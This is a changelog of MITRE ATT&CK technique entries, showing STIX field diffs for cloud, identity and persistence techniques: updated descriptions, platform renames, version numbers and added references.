A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021) |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
external_references | | {'source_name': 'Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022', 'description': 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials: Case Studies From the Wild. Retrieved March 9, 2023.', 'url': 'https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/'} |
external_references | | {'source_name': 'Netcraft SendGrid 2024', 'description': 'Graham Edgecombe. (2024, February 7). Phishception – SendGrid is abused to host phishing attacks impersonating itself. Retrieved October 15, 2024.', 'url': 'https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/'} |
[T1069.003] Permission Groups Discovery: Cloud Groups
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-03-21 13:33:40.625000+00:00 | 2024-10-15 15:51:35.759000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.4 | 1.5 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Office Suite |
x_mitre_platforms | | Identity Provider |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1538] Cloud Service Dashboard
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-04-19 04:25:33.300000+00:00 | 2024-10-15 15:51:56.279000+00:00 |
x_mitre_version | 1.3 | 1.4 |
x_mitre_platforms[3] | Google Workspace | Identity Provider |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Office Suite |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
[T1526] Cloud Service Discovery
Current version: 1.4
Version changed from: 1.3 → 1.4
|
|
t | An adversary may attempt to enumerate the cloud services run | t | An adversary may attempt to enumerate the cloud services run |
| ning on a system after gaining access. These methods can dif | | ning on a system after gaining access. These methods can dif |
| fer from platform-as-a-service (PaaS), to infrastructure-as- | | fer from platform-as-a-service (PaaS), to infrastructure-as- |
| a-service (IaaS), or software-as-a-service (SaaS). Many serv | | a-service (IaaS), or software-as-a-service (SaaS). Many serv |
| ices exist throughout the various cloud providers and can in | | ices exist throughout the various cloud providers and can in |
| clude Continuous Integration and Continuous Delivery (CI/CD) | | clude Continuous Integration and Continuous Delivery (CI/CD) |
| , Lambda Functions, Azure AD, etc. They may also include sec | | , Lambda Functions, Entra ID, etc. They may also include sec |
| urity services, such as AWS GuardDuty and Microsoft Defender | | urity services, such as AWS GuardDuty and Microsoft Defender |
| for Cloud, and logging services, such as AWS CloudTrail and | | for Cloud, and logging services, such as AWS CloudTrail and |
| Google Cloud Audit Logs. Adversaries may attempt to discov | | Google Cloud Audit Logs. Adversaries may attempt to discov |
| er information about the services enabled throughout the env | | er information about the services enabled throughout the env |
| ironment. Azure tools and APIs, such as the Azure AD Graph A | | ironment. Azure tools and APIs, such as the Microsoft Graph |
| PI and Azure Resource Manager API, can enumerate resources a | | API and Azure Resource Manager API, can enumerate resources |
| nd services, including applications, management groups, reso | | and services, including applications, management groups, res |
| urces and policy definitions, and their relationships that a | | ources and policy definitions, and their relationships that |
| re accessible by an identity.(Citation: Azure - Resource Man | | are accessible by an identity.(Citation: Azure - Resource Ma |
| ager API)(Citation: Azure AD Graph API) For example, Storms | | nager API)(Citation: Azure AD Graph API) For example, Storm |
| potter is an open source tool for enumerating and constructi | | spotter is an open source tool for enumerating and construct |
| ng a graph for Azure resources and services, and Pacu is an | | ing a graph for Azure resources and services, and Pacu is an |
| open source AWS exploitation framework that supports several | | open source AWS exploitation framework that supports severa |
| methods for discovering cloud services.(Citation: Azure - S | | l methods for discovering cloud services.(Citation: Azure - |
| tormspotter)(Citation: GitHub Pacu) Adversaries may use the | | Stormspotter)(Citation: GitHub Pacu) Adversaries may use th |
| information gained to shape follow-on behaviors, such as ta | | e information gained to shape follow-on behaviors, such as t |
| rgeting data or credentials from enumerated services or evad | | argeting data or credentials from enumerated services or eva |
| ing identified defenses through [Disable or Modify Tools](ht | | ding identified defenses through [Disable or Modify Tools](h |
| tps://attack.mitre.org/techniques/T1562/001) or [Disable or | | ttps://attack.mitre.org/techniques/T1562/001) or [Disable or |
| Modify Cloud Logs](https://attack.mitre.org/techniques/T1562 | | Modify Cloud Logs](https://attack.mitre.org/techniques/T156 |
| /008). | | 2/008). |
New Detections:
- DS0028: Logon Session (Logon Session Creation)
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-05-04 18:01:44.086000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
description | An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
Adversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001) or [Disable or Modify Cloud Logs](https://attack.mitre.org/techniques/T1562/008). | An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
Adversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001) or [Disable or Modify Cloud Logs](https://attack.mitre.org/techniques/T1562/008). |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.3 | 1.4 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_contributors | | Arun Seelagan, CISA |
x_mitre_data_sources | | Logon Session: Logon Session Creation |
x_mitre_platforms | | Office Suite |
x_mitre_platforms | | Identity Provider |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1021.007] Remote Services: Cloud Services
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-04-14 22:27:04.095000+00:00 | 2024-10-15 15:52:47.255000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Office Suite |
x_mitre_platforms | | Identity Provider |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Google Workspace | |
[T1213.003] Data from Information Repositories: Code Repositories
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
t | Adversaries may leverage code repositories to collect valuab | t | Adversaries may leverage code repositories to collect valuab |
| le information. Code repositories are tools/services that st | | le information. Code repositories are tools/services that st |
| ore source code and automate software builds. They may be ho | | ore source code and automate software builds. They may be ho |
| sted internally or privately on third party sites such as Gi | | sted internally or privately on third party sites such as Gi |
| thub, GitLab, SourceForge, and BitBucket. Users typically in | | thub, GitLab, SourceForge, and BitBucket. Users typically in |
| teract with code repositories through a web application or c | | teract with code repositories through a web application or c |
| ommand-line utilities such as git. Once adversaries gain ac | | ommand-line utilities such as git. Once adversaries gain ac |
| cess to a victim network or a private code repository, they | | cess to a victim network or a private code repository, they |
| may collect sensitive information such as proprietary source | | may collect sensitive information such as proprietary source |
| code or credentials contained within software's source code | | code or [Unsecured Credentials](https://attack.mitre.org/te |
| . Having access to software's source code may allow adversa | | chniques/T1552) contained within software's source code. Ha |
| ries to develop [Exploits](https://attack.mitre.org/techniqu | | ving access to software's source code may allow adversaries |
| es/T1587/004), while credentials may provide access to addit | | to develop [Exploits](https://attack.mitre.org/techniques/T1 |
| ional resources using [Valid Accounts](https://attack.mitre. | | 587/004), while credentials may provide access to additional |
| org/techniques/T1078).(Citation: Wired Uber Breach)(Citation | | resources using [Valid Accounts](https://attack.mitre.org/t |
| : Krebs Adobe) **Note:** This is distinct from [Code Reposi | | echniques/T1078).(Citation: Wired Uber Breach)(Citation: Kre |
| tories](https://attack.mitre.org/techniques/T1593/003), whic | | bs Adobe) **Note:** This is distinct from [Code Repositorie |
| h focuses on conducting [Reconnaissance](https://attack.mitr | | s](https://attack.mitre.org/techniques/T1593/003), which foc |
| e.org/tactics/TA0043) via public code repositories. | | uses on conducting [Reconnaissance](https://attack.mitre.org |
| | | /tactics/TA0043) via public code repositories. |
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-18 22:44:01.723000+00:00 | 2024-09-04 13:03:54.101000+00:00 |
description | Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories. | Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories. |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
[T1059] Command and Scripting Interpreter
Current version: 2.5
Version changed from: 2.4 → 2.5
New Mitigations:
- M1033: Limit Software Installation
- M1047: Audit
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-03-27 16:43:58.795000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 2.4 | 2.5 |
x_mitre_platforms[5] | Azure AD | Office Suite |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Identity Provider |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1027.004] Obfuscated Files or Information: Compile After Delivery
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
t | Adversaries may attempt to make payloads difficult to discov | t | Adversaries may attempt to make payloads difficult to discov |
| er and analyze by delivering files to victims as uncompiled | | er and analyze by delivering files to victims as uncompiled |
| code. Text-based source code files may subvert analysis and | | code. Text-based source code files may subvert analysis and |
| scrutiny from protections targeting executables/binaries. Th | | scrutiny from protections targeting executables/binaries. Th |
| ese payloads will need to be compiled before execution; typi | | ese payloads will need to be compiled before execution; typi |
| cally via native utilities such as csc.exe or GCC/MinGW.(Cit | | cally via native utilities such as ilasm.exe(Citation: ATTAC |
| ation: ClearSky MuddyWater Nov 2018) Source code payloads m | | K IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater |
| ay also be encrypted, encoded, and/or embedded within other | | Nov 2018) Source code payloads may also be encrypted, encod |
| files, such as those delivered as a [Phishing](https://attac | | ed, and/or embedded within other files, such as those delive |
| k.mitre.org/techniques/T1566). Payloads may also be delivere | | red as a [Phishing](https://attack.mitre.org/techniques/T156 |
| d in formats unrecognizable and inherently benign to the nat | | 6). Payloads may also be delivered in formats unrecognizable |
| ive OS (ex: EXEs on macOS/Linux) before later being (re)comp | | and inherently benign to the native OS (ex: EXEs on macOS/L |
| iled into a proper executable binary with a bundled compiler | | inux) before later being (re)compiled into a proper executab |
| and execution framework.(Citation: TrendMicro WindowsAppMac | | le binary with a bundled compiler and execution framework.(C |
| ) | | itation: TrendMicro WindowsAppMac) |
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['User'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-03-29 20:59:32.293000+00:00 | 2024-10-03 17:43:14.766000+00:00 |
description | Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac) | Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac) |
x_mitre_version | 1.0 | 1.1 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
external_references | | {'source_name': 'ATTACK IQ', 'description': 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske. (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land Binaries. Retrieved July 15, 2024.', 'url': 'https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/'} |
x_mitre_contributors | | Liran Ravich, CardinalOps |
[T1554] Compromise Host Software Binary
Current version: 2.1
Version changed from: 2.0 → 2.1
|
|
t | Adversaries may modify host software binaries to establish p | t | Adversaries may modify host software binaries to establish p |
| ersistent access to systems. Software binaries/executables p | | ersistent access to systems. Software binaries/executables p |
| rovide a wide range of system commands or services, programs | | rovide a wide range of system commands or services, programs |
| , and libraries. Common software binaries are SSH clients, F | | , and libraries. Common software binaries are SSH clients, F |
| TP clients, email clients, web browsers, and many other user | | TP clients, email clients, web browsers, and many other user |
| or server applications. Adversaries may establish persiste | | or server applications. Adversaries may establish persiste |
| nce though modifications to host software binaries. For exam | | nce though modifications to host software binaries. For exam |
| ple, an adversary may replace or otherwise infect a legitima | | ple, an adversary may replace or otherwise infect a legitima |
| te application binary (or support files) with a backdoor. Si | | te application binary (or support files) with a backdoor. Si |
| nce these binaries may be routinely executed by applications | | nce these binaries may be routinely executed by applications |
| or the user, the adversary can leverage this for persistent | | or the user, the adversary can leverage this for persistent |
| access to the host. An adversary may also modify an existi | | access to the host. An adversary may also modify a software |
| ng binary by patching in malicious functionality (e.g., IAT | | binary such as an SSH client in order to persistently colle |
| Hooking/Entry point patching)(Citation: Unit42 Banking Troja | | ct credentials during logins (i.e., [Modify Authentication P |
| ns Hooking 2022) prior to the binary’s legitimate execution. | | rocess](https://attack.mitre.org/techniques/T1556)).(Citatio |
| For example, an adversary may modify the entry point of a b | | n: Google Cloud Mandiant UNC3886 2024) An adversary may als |
| inary to point to malicious code patched in by the adversary | | o modify an existing binary by patching in malicious functio |
| before resuming normal execution flow.(Citation: ESET FontO | | nality (e.g., IAT Hooking/Entry point patching)(Citation: Un |
| nLake Analysis 2021) | | it42 Banking Trojans Hooking 2022) prior to the binary’s leg |
| | | itimate execution. For example, an adversary may modify the |
| | | entry point of a binary to point to malicious code patched i |
| | | n by the adversary before resuming normal execution flow.(Ci |
| | | tation: ESET FontOnLake Analysis 2021) After modifying a bi |
| | | nary, an adversary may attempt to [Impair Defenses](https:// |
| | | attack.mitre.org/techniques/T1562) by preventing it from upd |
| | | ating (e.g., via the `yum-versionlock` command or `versionlo |
| | | ck.list` file in Linux systems that use the yum package mana |
| | | ger).(Citation: Google Cloud Mandiant UNC3886 2024) |
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-04-16 13:03:40.824000+00:00 | 2024-10-12 16:52:46.067000+00:00 |
description | Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021) | Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024) |
x_mitre_version | 2.0 | 2.1 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
external_references | | {'source_name': 'Google Cloud Mandiant UNC3886 2024', 'description': ' Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert: Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024.', 'url': 'https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations'} |
x_mitre_contributors | | Liran Ravich, CardinalOps |
x_mitre_contributors | | Jamie Williams (U ω U), PANW Unit 42 |
[T1556.009] Modify Authentication Process: Conditional Access Policies
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
t | Adversaries may disable or modify conditional access policie | t | Adversaries may disable or modify conditional access policie |
| s to enable persistent access to compromised accounts. Condi | | s to enable persistent access to compromised accounts. Condi |
| tional access policies are additional verifications used by | | tional access policies are additional verifications used by |
| identity providers and identity and access management system | | identity providers and identity and access management system |
| s to determine whether a user should be granted access to a | | s to determine whether a user should be granted access to a |
| resource. For example, in Azure AD, Okta, and JumpCloud, us | | resource. For example, in Entra ID, Okta, and JumpCloud, us |
| ers can be denied access to applications based on their IP a | | ers can be denied access to applications based on their IP a |
| ddress, device enrollment status, and use of multi-factor au | | ddress, device enrollment status, and use of multi-factor au |
| thentication.(Citation: Microsoft Conditional Access)(Citati | | thentication.(Citation: Microsoft Conditional Access)(Citati |
| on: JumpCloud Conditional Access Policies)(Citation: Okta Co | | on: JumpCloud Conditional Access Policies)(Citation: Okta Co |
| nditional Access Policies) In some cases, identity providers | | nditional Access Policies) In some cases, identity providers |
| may also support the use of risk-based metrics to deny sign | | may also support the use of risk-based metrics to deny sign |
| -ins based on a variety of indicators. In AWS and GCP, IAM p | | -ins based on a variety of indicators. In AWS and GCP, IAM p |
| olicies can contain `condition` attributes that verify arbit | | olicies can contain `condition` attributes that verify arbit |
| rary constraints such as the source IP, the date the request | | rary constraints such as the source IP, the date the request |
| was made, and the nature of the resources or regions being | | was made, and the nature of the resources or regions being |
| requested.(Citation: AWS IAM Conditions)(Citation: GCP IAM C | | requested.(Citation: AWS IAM Conditions)(Citation: GCP IAM C |
| onditions) These measures help to prevent compromised creden | | onditions) These measures help to prevent compromised creden |
| tials from resulting in unauthorized access to data or resou | | tials from resulting in unauthorized access to data or resou |
| rces, as well as limit user permissions to only those requir | | rces, as well as limit user permissions to only those requir |
| ed. By modifying conditional access policies, such as addi | | ed. By modifying conditional access policies, such as addi |
| ng additional trusted IP ranges, removing [Multi-Factor Auth | | ng additional trusted IP ranges, removing [Multi-Factor Auth |
| entication](https://attack.mitre.org/techniques/T1556/006) r | | entication](https://attack.mitre.org/techniques/T1556/006) r |
| equirements, or allowing additional [Unused/Unsupported Clou | | equirements, or allowing additional [Unused/Unsupported Clou |
| d Regions](https://attack.mitre.org/techniques/T1535), adver | | d Regions](https://attack.mitre.org/techniques/T1535), adver |
| saries may be able to ensure persistent access to accounts a | | saries may be able to ensure persistent access to accounts a |
| nd circumvent defensive measures. | | nd circumvent defensive measures. |
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-04-18 20:53:46.175000+00:00 | 2024-09-16 16:54:47.595000+00:00 |
description | Adversaries may disable or modify conditional access policies to enable persistent access to compromised accounts. Conditional access policies are additional verifications used by identity providers and identity and access management systems to determine whether a user should be granted access to a resource.
For example, in Azure AD, Okta, and JumpCloud, users can be denied access to applications based on their IP address, device enrollment status, and use of multi-factor authentication.(Citation: Microsoft Conditional Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional Access Policies) In some cases, identity providers may also support the use of risk-based metrics to deny sign-ins based on a variety of indicators. In AWS and GCP, IAM policies can contain `condition` attributes that verify arbitrary constraints such as the source IP, the date the request was made, and the nature of the resources or regions being requested.(Citation: AWS IAM Conditions)(Citation: GCP IAM Conditions) These measures help to prevent compromised credentials from resulting in unauthorized access to data or resources, as well as limit user permissions to only those required.
By modifying conditional access policies, such as adding additional trusted IP ranges, removing [Multi-Factor Authentication](https://attack.mitre.org/techniques/T1556/006) requirements, or allowing additional [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535), adversaries may be able to ensure persistent access to accounts and circumvent defensive measures. | Adversaries may disable or modify conditional access policies to enable persistent access to compromised accounts. Conditional access policies are additional verifications used by identity providers and identity and access management systems to determine whether a user should be granted access to a resource.
For example, in Entra ID, Okta, and JumpCloud, users can be denied access to applications based on their IP address, device enrollment status, and use of multi-factor authentication.(Citation: Microsoft Conditional Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional Access Policies) In some cases, identity providers may also support the use of risk-based metrics to deny sign-ins based on a variety of indicators. In AWS and GCP, IAM policies can contain `condition` attributes that verify arbitrary constraints such as the source IP, the date the request was made, and the nature of the resources or regions being requested.(Citation: AWS IAM Conditions)(Citation: GCP IAM Conditions) These measures help to prevent compromised credentials from resulting in unauthorized access to data or resources, as well as limit user permissions to only those required.
By modifying conditional access policies, such as adding additional trusted IP ranges, removing [Multi-Factor Authentication](https://attack.mitre.org/techniques/T1556/006) requirements, or allowing additional [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535), adversaries may be able to ensure persistent access to accounts and circumvent defensive measures. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[1] | SaaS | Identity Provider |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
[T1213.001] Data from Information Repositories: Confluence
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
t | Adversaries may leverage Confluence repositories to mine va | t | Adversaries may leverage Confluence repositories to mine va |
| luable information. Often found in development environments | | luable information. Often found in development environments |
| alongside Atlassian JIRA, Confluence is generally used to st | | alongside Atlassian JIRA, Confluence is generally used to st |
| ore development-related documentation, however, in general m | | ore development-related documentation, however, in general m |
| ay contain more diverse categories of useful information, su | | ay contain more diverse categories of useful information, su |
| ch as: * Policies, procedures, and standards * Physical / l | | ch as: * Policies, procedures, and standards * Physical / l |
| ogical network diagrams * System architecture diagrams * Tec | | ogical network diagrams * System architecture diagrams * Tec |
| hnical system documentation * Testing / development credenti | | hnical system documentation * Testing / development credenti |
| als * Work / project schedules * Source code snippets * Link | | als (i.e., [Unsecured Credentials](https://attack.mitre.org/ |
| s to network shares and other internal resources | | techniques/T1552)) * Work / project schedules * Source code |
| | | snippets * Links to network shares and other internal resour |
| | | ces |
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['User'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-06-08 17:08:08.386000+00:00 | 2024-08-30 13:45:42.840000+00:00 |
description |
Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
|
Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
|
x_mitre_version | 1.0 | 1.1 |
[T1136] Create Account
Current version: 2.5
Version changed from: 2.4 → 2.5
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-01-31 20:46:43.215000+00:00 | 2024-10-15 15:53:21.895000+00:00 |
x_mitre_version | 2.4 | 2.5 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Office Suite |
x_mitre_platforms | | Identity Provider |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1578.002] Modify Cloud Compute Infrastructure: Create Cloud Instance
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_contributors | | ['Arun Seelagan, CISA'] |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['User'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-03-08 10:33:02.034000+00:00 | 2024-09-30 13:28:37.416000+00:00 |
external_references[1]['url'] | https://content.fireeye.com/m-trends/rpt-m-trends-2020 | https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf |
x_mitre_version | 1.1 | 1.2 |
